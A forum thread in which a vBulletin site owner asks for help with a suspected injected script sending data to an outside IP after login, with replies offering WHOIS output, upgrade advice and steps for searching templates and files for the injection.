I purchased VBulletin several years ago.

Currently using Version 3.6.7

I have not upgraded because I use it for a Tech Support BB and thought all would be well.

I just upgraded to Kaspersky 9.0 and it reports that access to my VBulletin contains a link to 78.110.75.21 and has been identified as a site that steal passwords, credit card numbers, etc.

I ran some software that captures all network traffic and monitored communication with my site and VBulliten. In the middle of the page load - thers was a lot of data transferred to THAT IP address.

I called the people who host my site and asked if THEY were injecting this detour or communication. Their reply was NO. They said that they have seen hackers inject java scripts into BB to accomplish things like this.

So ... Now I am asking the folks at VBulletin if this is YOUR communication or is it a real security issue?

Will an upgrade to the latest release address this?

Thanks in advance for your reply.

Not a pro vb coder but in my opinion you need to actually vist that ip to check if its a site or just someones server ip. Vbulletin doest streamline things from your site they only have a call back function that lets them verify if theres a real liscence there and who its registered to. I would upgrade but most of your mods wont work if you upgrade to 3.7.4 seeing its the securest stable out right now. Have you checked the ip? you can paste it in the browser and view that way if that helps.

You get a "Fail to Connect".

My question is Why/How is this redirect taking place and can it be terminated?

you can always bann that ip from your server. I would run suspect file versions and see if anything strange shows up.

You can you`ll have to find where the leak is. Its probably someon using some javascript to access the site and them having that info stored by php or perl into a database. My suggestion is to upgrade to a version thats CRSF and XSS protected. I would say 3.7.4 SP1 since the newest 3.6 doenst have the hole fix.

--------------- Added 1230144309 at 1230144309 ---------------

OrgName: RIPE Network Coordination Centre
OrgID: RIPE
Address: P.O. Box 10096
City: Amsterdam
StateProv:
PostalCode: 1001EB
Country: NL

ReferralServer: whois://whois.ripe.net:43

NetRange: 78.0.0.0 - 78.255.255.255
CIDR: 78.0.0.0/8
NetName: 78-RIPE
NetHandle: NET-78-0-0-0-1
Parent:
NetType: Allocated to RIPE NCC
NameServer: NS-PRI.RIPE.NET
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
NameServer: TINNIE.ARIN.NET
NameServer: SUNIC.SUNET.SE
NameServer: NS.LACNIC.NET
Comment: These addresses have been further assigned to users in
Comment: the RIPE NCC region. Contact information can be found in
Comment: the RIPE database at http://www.ripe.net/whois
RegDate: 2006-08-29
Updated: 2006-09-07

# ARIN WHOIS database, last updated 2008-12-23 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.

there you the ips info

--------------- Added 1230144367 at 1230144367 ---------------

Might be a proxy or shell account it could be hard to know it thats the only IP being used.

--------------- Added 1230144505 at 1230144505 ---------------

Hers a link to more ip info.

http://www.geoiptool.com/en/?IP=78.110.75.21

I have upgraded to 3.7.4.

Issue still exists.

It occurs AFTER users or Admin has log on - so Logon name and password may be compromised.

Any suggestions on debugging and killing this thing?

Admin CP > Maintenance > Diagnostics > Suspect File Versions

See if anything comes up there.

Also:
- Search your post table for this IP
- Search your files for this IP
- Search templates for this IP